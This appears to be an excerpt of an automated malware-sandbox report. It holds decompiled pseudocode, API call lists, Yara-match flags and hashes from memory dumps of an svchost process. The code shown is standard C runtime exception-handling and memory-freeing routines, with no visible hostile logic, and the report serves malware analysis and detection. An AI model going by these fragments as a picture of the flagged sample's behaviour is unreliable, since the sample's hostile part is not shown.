                                                																_t318 = _t317 - 0x18;
                                                																_push(_t254);
                                                																_push(_t304);
                                                																_t305 = _v100;
                                                																_push(_t290);
                                                																__eflags = _t305;
                                                																if(__eflags == 0) {
                                                																	E6FD59ED0(_t254, _t267, _t282, _t290, _t305, __eflags);
                                                																	asm("int3");
                                                																	_push(_t314);
                                                																	_push(_t254);
                                                																	_push(_t305);
                                                																	_push(_t290);
                                                																	_t292 = _v144;
                                                																	_t306 = 0;
                                                																	__eflags =  *_t292;
                                                																	if( *_t292 <= 0) {
                                                																		L103:
                                                																		_t202 = 0;
                                                																		__eflags = 0;
                                                																	} else {
                                                																		_t256 = 0;
                                                																		while(1) {
                                                																			_t206 = E6FD57A7A( *((intOrPtr*)(_t256 + _t292[1] + 4)) + 4, 0x6fd6ad1c);
                                                																			__eflags = _t206;
                                                																			if(_t206 == 0) {
                                                																				break;
                                                																			}
                                                																			_t306 = _t306 + 1;
                                                																			_t256 = _t256 + 0x10;
                                                																			__eflags = _t306 -  *_t292;
                                                																			if(_t306 <  *_t292) {
                                                																				continue;
                                                																			} else {
                                                																				goto L103;
                                                																			}
                                                																			goto L104;
                                                																		}
                                                																		_t202 = 1;
                                                																	}
                                                																	L104:
                                                																	return _t202;
                                                																} else {
                                                																	_t294 =  *_t305;
                                                																	_t257 = 0;
                                                																	__eflags = _t294;
                                                																	if(_t294 > 0) {
                                                																		_t283 = 0;
                                                																		_v16 = 0;
                                                																		_t210 =  *((intOrPtr*)( *((intOrPtr*)(_v4 + 0x1c)) + 0xc));
                                                																		_t211 = _t210 + 4;
                                                																		__eflags = _t211;
                                                																		_v28 =  *_t210;
                                                																		_v36 = _t211;
                                                																		do {
                                                																			_t271 = _t211;
                                                																			_t212 = _v28;
                                                																			_v24 = _t211;
                                                																			_v20 = _t212;
                                                																			__eflags = _t212;
                                                																			if(_t212 > 0) {
                                                																				_t214 =  *((intOrPtr*)(_t305 + 4)) + _t283;
                                                																				__eflags = _t214;
                                                																				_v32 = _t214;
                                                																				while(1) {
                                                																					_t215 = E6FD573F5(_t214,  *_t271,  *((intOrPtr*)(_v4 + 0x1c)));
                                                																					_t318 = _t318 + 0xc;
                                                																					__eflags = _t215;
                                                																					if(_t215 != 0) {
                                                																						break;
                                                																					}
                                                																					_t217 = _v20 - 1;
                                                																					_t271 = _v24 + 4;
                                                																					_v20 = _t217;
                                                																					__eflags = _t217;
                                                																					_v24 = _v24 + 4;
                                                																					_t214 = _v32;
                                                																					if(_t217 > 0) {
                                                																						continue;
                                                																					} else {
                                                																					}
                                                																					L95:
                                                																					_t283 = _v16;
                                                																					goto L96;
                                                																				}
                                                																				_t257 = 1;
                                                																				goto L95;
                                                																			}
                                                																			L96:
                                                																			_t211 = _v36;
                                                																			_t283 = _t283 + 0x10;
                                                																			_v16 = _t283;
                                                																			_t294 = _t294 - 1;
                                                																			__eflags = _t294;
                                                																		} while (_t294 != 0);
                                                																	}
                                                																	return _t257;
                                                																}
                                                															} else {
                                                																_t198 = E6FD58349(_t267, _t254, _a24, _a20,  &_v16,  &_v12);
                                                																_t273 = _v16;
                                                																_t319 = _t317 + 0x14;
                                                																_t285 = _v12;
                                                																if(_t273 < _t285) {
                                                																	_t137 =  &(_t198[3]); // 0xc
                                                																	_t310 = _t137;
                                                																	_t198 = _a20;
                                                																	do {
                                                																		if(_t198 >=  *((intOrPtr*)(_t310 - 0xc)) && _t198 <=  *((intOrPtr*)(_t310 - 8))) {
                                                																			_t221 =  *_t310 << 4;
                                                																			if( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) == 0) {
                                                																				L79:
                                                																				_t222 = _t221 + _t310[1] + 0xfffffff0;
                                                																				_t300 = _v0;
                                                																				if(( *(_t221 + _t310[1] + 0xfffffff0) & 0x00000040) == 0) {
                                                																					_push(1);
                                                																					_t155 = _t310 - 0xc; // 0x0
                                                																					E6FD569E3(_t254, _t285, _t300, _a4, _a8, _a12, _t254, _t222, 0, _t155, _a24, _a28);
                                                																					_t285 = _v12;
                                                																					_t319 = _t319 + 0x2c;
                                                																					_t273 = _v16;
                                                																				}
                                                																			} else {
                                                																				_t285 = _v12;
                                                																				_t254 = _a16;
                                                																				if( *((char*)( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) + 8)) == 0) {
                                                																					goto L79;
                                                																				}
                                                																			}
                                                																			_t198 = _a20;
                                                																		}
                                                																		_t273 = _t273 + 1;
                                                																		_t310 =  &(_t310[5]);
                                                																		_v16 = _t273;
                                                																	} while (_t273 < _t285);
                                                																}
                                                																goto L83;
                                                															}
                                                														} else {
                                                															__imp__EncodePointer(0);
                                                															_t304 = _t199;
                                                															if( *((intOrPtr*)(E6FD580E6(_t254, _t267, _t282, _t290, _t304, _t341) + 8)) == _t304 ||  *_t290 == 0xe0434f4d ||  *_t290 == 0xe0434352) {
                                                																goto L72;
                                                															} else {
                                                																_t198 = E6FD5826C(_t290, _a4, _a8, _a12, _t254, _a24, _a28);
                                                																_t317 = _t317 + 0x1c;
                                                																if(_t198 != 0) {
                                                																	L83:
                                                																	goto L84;
                                                																} else {
                                                																	goto L72;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											_t336 =  *((intOrPtr*)(_t304 + 0x1c));
                                                											if( *((intOrPtr*)(_t304 + 0x1c)) == 0) {
                                                												goto L62;
                                                											} else {
                                                												goto L19;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                 			}

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6FD56BAC
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 6FD56C27
                                                • ___TypeMatch.LIBVCRUNTIME ref: 6FD56CA5
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 6FD56D27
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6FD56D58
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 6FD56DA7
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 6FD56DC9
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 6FD56DE1
                                                • _UnwindNestedFrames.LIBCMT ref: 6FD56DE9
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 6FD56DF5
                                                • CallUnexpected.LIBVCRUNTIME ref: 6FD56E00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 410073093-393685449
                                                • Opcode ID: 871584129efb9cf9bed9c6efb7164de37edf0c32a09af42ad19d54ef97713dd1
                                                • Instruction ID: a2b207c71a14ad65e775cbe93c612ee33998201b640c850be3df03533b6fc067
                                                • Opcode Fuzzy Hash: 871584129efb9cf9bed9c6efb7164de37edf0c32a09af42ad19d54ef97713dd1
                                                • Instruction Fuzzy Hash: 62B16971804709EFDF90CFA4C880A9EBBB4BF06324F10456AE8516B690D735FA65CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 03997F35
                                                  • Part of subcall function 0399C4BF: try_get_function.LIBVCRUNTIME ref: 0399C4D4
                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03997F42
                                                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 03997F58
                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 03997F66
                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 03997F74
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 03997F9E
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 03997FA9
                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 03997FBE
                                                • RtlDeleteCriticalSection.NTDLL(039C23B8), ref: 03997FEE
                                                • CloseHandle.KERNEL32(00000000), ref: 03997FFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$CriticalHandleSection__crt_fast_encode_pointer$CloseCreateDeleteEventInitializeModule___vcrt_try_get_function
                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$kernel32.dll
                                                • API String ID: 3315678721-758797311
                                                • Opcode ID: e145a667aa59cb641d00c0d2076c6f031ed768c67bcbc606ffb80766235f9878
                                                • Instruction ID: a5568969cec880656848e17f770935b217f91fb905b7c1775fb138c59a0f1e55
                                                • Opcode Fuzzy Hash: e145a667aa59cb641d00c0d2076c6f031ed768c67bcbc606ffb80766235f9878
                                                • Instruction Fuzzy Hash: 9C11B43566C311AFFF10BBF96D09A6E36989BC5A41F08081BFA15EE146EEB084009665
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$Info
                                                • String ID:
                                                • API String ID: 2509303402-0
                                                • Opcode ID: d8ba45c24533e0c48a1bfa12ff6dcbcef48bf294412a5e05cb6aee1364a3048d
                                                • Instruction ID: cc50e708b0ad26f017668fa2e48ed3955683622506df12437d5329f43b04bb36
                                                • Opcode Fuzzy Hash: d8ba45c24533e0c48a1bfa12ff6dcbcef48bf294412a5e05cb6aee1364a3048d
                                                • Instruction Fuzzy Hash: EEB1BE799047059FDB21DFADC880BEEFBF9FF88340F184269E855AB251D77198418BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0399B750
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 0399B7CB
                                                • ___TypeMatch.LIBVCRUNTIME ref: 0399B849
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0399B8FC
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 0399B94B
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0399B985
                                                • _UnwindNestedFrames.LIBCMT ref: 0399B98D
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 0399B999
                                                • CallUnexpected.LIBVCRUNTIME ref: 0399B9A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception$SpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 3606550248-393685449
                                                • Opcode ID: 14769a727aefe22ca73d307fca00e9ad20d67e8aed0619ba055478fbf3cf765c
                                                • Instruction ID: 56ff6848779920b894cf53afab6ccd535cccedfac8f9951ea33e5fab43fbf2fa
                                                • Opcode Fuzzy Hash: 14769a727aefe22ca73d307fca00e9ad20d67e8aed0619ba055478fbf3cf765c
                                                • Instruction Fuzzy Hash: FBB18E75C00309EFEF24DF9CE884AAEB7BDFF48354F18419AE4516A650D339A941CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6FD5D363(intOrPtr _a4) {
                                                				intOrPtr _v8;
                                                				intOrPtr _t25;
                                                				intOrPtr* _t26;
                                                				intOrPtr _t28;
                                                				intOrPtr* _t29;
                                                				intOrPtr* _t31;
                                                				intOrPtr* _t45;
                                                				intOrPtr* _t46;
                                                				intOrPtr* _t47;
                                                				intOrPtr* _t55;
                                                				intOrPtr* _t70;
                                                				intOrPtr _t74;
                                                
                                                				_t74 = _a4;
                                                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                				if(_t25 != 0 && _t25 != 0x6fd69b20) {
                                                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                					if(_t45 != 0 &&  *_t45 == 0) {
                                                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                						if(_t46 != 0 &&  *_t46 == 0) {
                                                							E6FD59FB4(_t46);
                                                							E6FD5D6CD( *((intOrPtr*)(_t74 + 0x88)));
                                                						}
                                                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                						if(_t47 != 0 &&  *_t47 == 0) {
                                                							E6FD59FB4(_t47);
                                                							E6FD5D7CB( *((intOrPtr*)(_t74 + 0x88)));
                                                						}
                                                						E6FD59FB4( *((intOrPtr*)(_t74 + 0x7c)));
                                                						E6FD59FB4( *((intOrPtr*)(_t74 + 0x88)));
                                                					}
                                                				}
                                                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                				if(_t26 != 0 &&  *_t26 == 0) {
                                                					E6FD59FB4( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                					E6FD59FB4( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                					E6FD59FB4( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                					E6FD59FB4( *((intOrPtr*)(_t74 + 0x8c)));
                                                				}
                                                				E6FD5D4D6( *((intOrPtr*)(_t74 + 0x9c)));
                                                				_t28 = 6;
                                                				_t55 = _t74 + 0xa0;
                                                				_v8 = _t28;
                                                				_t70 = _t74 + 0x28;
                                                				do {
                                                					if( *((intOrPtr*)(_t70 - 8)) != 0x6fd695f0) {
                                                						_t31 =  *_t70;
                                                						if(_t31 != 0 &&  *_t31 == 0) {
                                                							E6FD59FB4(_t31);
                                                							E6FD59FB4( *_t55);
                                                						}
                                                						_t28 = _v8;
                                                					}
                                                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                						if(_t29 != 0 &&  *_t29 == 0) {
                                                							E6FD59FB4(_t29);
                                                						}
                                                						_t28 = _v8;
                                                					}
                                                					_t55 = _t55 + 4;
                                                					_t70 = _t70 + 0x10;
                                                					_t28 = _t28 - 1;
                                                					_v8 = _t28;
                                                				} while (_t28 != 0);
                                                				return E6FD59FB4(_t74);
                                                			}
















                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 6FD5D3A7
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D6EA
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D6FC
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D70E
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D720
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D732
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D744
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D756
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D768
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D77A
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D78C
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D79E
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D7B0
                                                  • Part of subcall function 6FD5D6CD: _free.LIBCMT ref: 6FD5D7C2
                                                • _free.LIBCMT ref: 6FD5D39C
                                                  • Part of subcall function 6FD59FB4: HeapFree.KERNEL32(00000000,00000000,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?), ref: 6FD59FCA
                                                  • Part of subcall function 6FD59FB4: GetLastError.KERNEL32(?,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?,?), ref: 6FD59FDC
                                                • _free.LIBCMT ref: 6FD5D3BE
                                                • _free.LIBCMT ref: 6FD5D3D3
                                                • _free.LIBCMT ref: 6FD5D3DE
                                                • _free.LIBCMT ref: 6FD5D400
                                                • _free.LIBCMT ref: 6FD5D413
                                                • _free.LIBCMT ref: 6FD5D421
                                                • _free.LIBCMT ref: 6FD5D42C
                                                • _free.LIBCMT ref: 6FD5D464
                                                • _free.LIBCMT ref: 6FD5D46B
                                                • _free.LIBCMT ref: 6FD5D488
                                                • _free.LIBCMT ref: 6FD5D4A0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 83744068f8a138381f16f599da2dc8001207209fee2ab8b09dcb3841ac0c09ea
                                                • Instruction ID: 9c35a145603be1280cfd382ef7240f5d8efc5190271600d4c5dfd16e8391a380
                                                • Opcode Fuzzy Hash: 83744068f8a138381f16f599da2dc8001207209fee2ab8b09dcb3841ac0c09ea
                                                • Instruction Fuzzy Hash: 2031F8B1608304DFEF91AF39D940B9AB3EAAF00354F10552AE559DA294DF71F8A0CB31
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 039AC287
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADF7E
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADF90
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFA2
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFB4
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFC6
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFD8
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFEA
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039ADFFC
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039AE00E
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039AE020
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039AE032
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039AE044
                                                  • Part of subcall function 039ADF61: _free.LIBCMT ref: 039AE056
                                                • _free.LIBCMT ref: 039AC27C
                                                  • Part of subcall function 039A496C: HeapFree.KERNEL32(00000000,00000000,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?), ref: 039A4982
                                                  • Part of subcall function 039A496C: GetLastError.KERNEL32(?,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?,?), ref: 039A4994
                                                • _free.LIBCMT ref: 039AC29E
                                                • _free.LIBCMT ref: 039AC2B3
                                                • _free.LIBCMT ref: 039AC2BE
                                                • _free.LIBCMT ref: 039AC2E0
                                                • _free.LIBCMT ref: 039AC2F3
                                                • _free.LIBCMT ref: 039AC301
                                                • _free.LIBCMT ref: 039AC30C
                                                • _free.LIBCMT ref: 039AC344
                                                • _free.LIBCMT ref: 039AC34B
                                                • _free.LIBCMT ref: 039AC368
                                                • _free.LIBCMT ref: 039AC380
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 3d5a612719f40ca5a697d73fe7cd3b332a8458ffaeb5bac6b7136a863746cabb
                                                • Instruction ID: a3dacc413433c359ce158dc588719ba682992f37a7cb3cd9fd837761c7a4c9ec
                                                • Opcode Fuzzy Hash: 3d5a612719f40ca5a697d73fe7cd3b332a8458ffaeb5bac6b7136a863746cabb
                                                • Instruction Fuzzy Hash: 12316035608B04DFDB20EABDD844B5AB7ECAF80790F184669E459DF260DF71E850DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __Getcvt.LIBCPMT ref: 0399600E
                                                • __Getcvt.LIBCPMT ref: 03996046
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0399606E
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 039960AC
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 039960EC
                                                • numpunct.LIBCPMT ref: 039960F4
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 039960FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task$Getcvt$Exception@8Thrownumpunct
                                                • String ID: false$true
                                                • API String ID: 3191441162-2658103896
                                                • Opcode ID: d54be9c4f87c24154cb7062c2f82243672aed74ea7fce125a3eddb431de3ed7c
                                                • Instruction ID: e68272fbecc41226659334a26787134c2309ee9d3661ed27f6633d9e37ff0bc3
                                                • Opcode Fuzzy Hash: d54be9c4f87c24154cb7062c2f82243672aed74ea7fce125a3eddb431de3ed7c
                                                • Instruction Fuzzy Hash: F8412535A083418FEF14DF68C9407AABBB9EF85214F1981AFD8445F342DB769905CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6FD5AFEA(char _a4) {
                                                				char _v8;
                                                
                                                				_t26 = _a4;
                                                				_t52 =  *_a4;
                                                				if( *_a4 != 0x6fd61df0) {
                                                					E6FD59FB4(_t52);
                                                					_t26 = _a4;
                                                				}
                                                				E6FD59FB4( *((intOrPtr*)(_t26 + 0x3c)));
                                                				E6FD59FB4( *((intOrPtr*)(_a4 + 0x30)));
                                                				E6FD59FB4( *((intOrPtr*)(_a4 + 0x34)));
                                                				E6FD59FB4( *((intOrPtr*)(_a4 + 0x38)));
                                                				E6FD59FB4( *((intOrPtr*)(_a4 + 0x28)));
                                                				E6FD59FB4( *((intOrPtr*)(_a4 + 0x2c)));
                                                				E6FD59FB4( *((intOrPtr*)(_a4 + 0x40)));
                                                				E6FD59FB4( *((intOrPtr*)(_a4 + 0x44)));
                                                				E6FD59FB4( *((intOrPtr*)(_a4 + 0x360)));
                                                				_v8 =  &_a4;
                                                				E6FD5AEB0(5,  &_v8);
                                                				_v8 =  &_a4;
                                                				return E6FD5AF00(4,  &_v8);
                                                			}





                                                APIs
                                                • _free.LIBCMT ref: 6FD5AFFE
                                                  • Part of subcall function 6FD59FB4: HeapFree.KERNEL32(00000000,00000000,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?), ref: 6FD59FCA
                                                  • Part of subcall function 6FD59FB4: GetLastError.KERNEL32(?,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?,?), ref: 6FD59FDC
                                                • _free.LIBCMT ref: 6FD5B00A
                                                • _free.LIBCMT ref: 6FD5B015
                                                • _free.LIBCMT ref: 6FD5B020
                                                • _free.LIBCMT ref: 6FD5B02B
                                                • _free.LIBCMT ref: 6FD5B036
                                                • _free.LIBCMT ref: 6FD5B041
                                                • _free.LIBCMT ref: 6FD5B04C
                                                • _free.LIBCMT ref: 6FD5B057
                                                • _free.LIBCMT ref: 6FD5B065
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 2f315500217ec595588157691310045d98d58bf20d4f318b95f2ab26f63bbc49
                                                • Instruction ID: 5304281465e57801efa31ad042b6e0591807b6cb3f565a8a3a52a64e1d62d22b
                                                • Opcode Fuzzy Hash: 2f315500217ec595588157691310045d98d58bf20d4f318b95f2ab26f63bbc49
                                                • Instruction Fuzzy Hash: 1A11B6B6100248BFCF81DF94C940CD97BBAEF14254B4152A1FA088F2A5DB31FA60DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 039A5DD6
                                                  • Part of subcall function 039A496C: HeapFree.KERNEL32(00000000,00000000,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?), ref: 039A4982
                                                  • Part of subcall function 039A496C: GetLastError.KERNEL32(?,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?,?), ref: 039A4994
                                                • _free.LIBCMT ref: 039A5DE2
                                                • _free.LIBCMT ref: 039A5DED
                                                • _free.LIBCMT ref: 039A5DF8
                                                • _free.LIBCMT ref: 039A5E03
                                                • _free.LIBCMT ref: 039A5E0E
                                                • _free.LIBCMT ref: 039A5E19
                                                • _free.LIBCMT ref: 039A5E24
                                                • _free.LIBCMT ref: 039A5E2F
                                                • _free.LIBCMT ref: 039A5E3D
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: ffd8e02bae27000d9d191fc33cfe40a23da899faf84b08954f4d01e3a173baea
                                                • Instruction ID: 007784e593a31d2fd559e37eb7bd39a9fd7c3fd1c3e6500bf4710378498083dc
                                                • Opcode Fuzzy Hash: ffd8e02bae27000d9d191fc33cfe40a23da899faf84b08954f4d01e3a173baea
                                                • Instruction Fuzzy Hash: D511B97A108608FFCB01EF99C840DED7BB9EFC4A90F114291F9489F221D671DE609B84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0aa5c53377d6a1c3e6b6ffca0d6281793f1c8ae0abcf291923756ebd064b890
                                                • Instruction ID: b65ab77c75bdb626fed1e9ad0b01d82756bad806b2e3aa315022d4b34be7c29c
                                                • Opcode Fuzzy Hash: e0aa5c53377d6a1c3e6b6ffca0d6281793f1c8ae0abcf291923756ebd064b890
                                                • Instruction Fuzzy Hash: 52C1A275A08349AFEF11DFACC990BEEBBB8BF49350F184184D445AB392C7719941CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 0399A647
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?), ref: 0399A6DB
                                                • ___crtCompareStringEx.LIBCPMT ref: 0399A6F5
                                                • ___crtCompareStringEx.LIBCPMT ref: 0399A731
                                                • ___crtCompareStringEx.LIBCPMT ref: 0399A7AA
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0399A7C5
                                                • __freea.LIBCMT ref: 0399A7D2
                                                  • Part of subcall function 039A4899: RtlAllocateHeap.NTDLL(00000000,039920FE,73B76490), ref: 039A48CB
                                                • __freea.LIBCMT ref: 0399A7E5
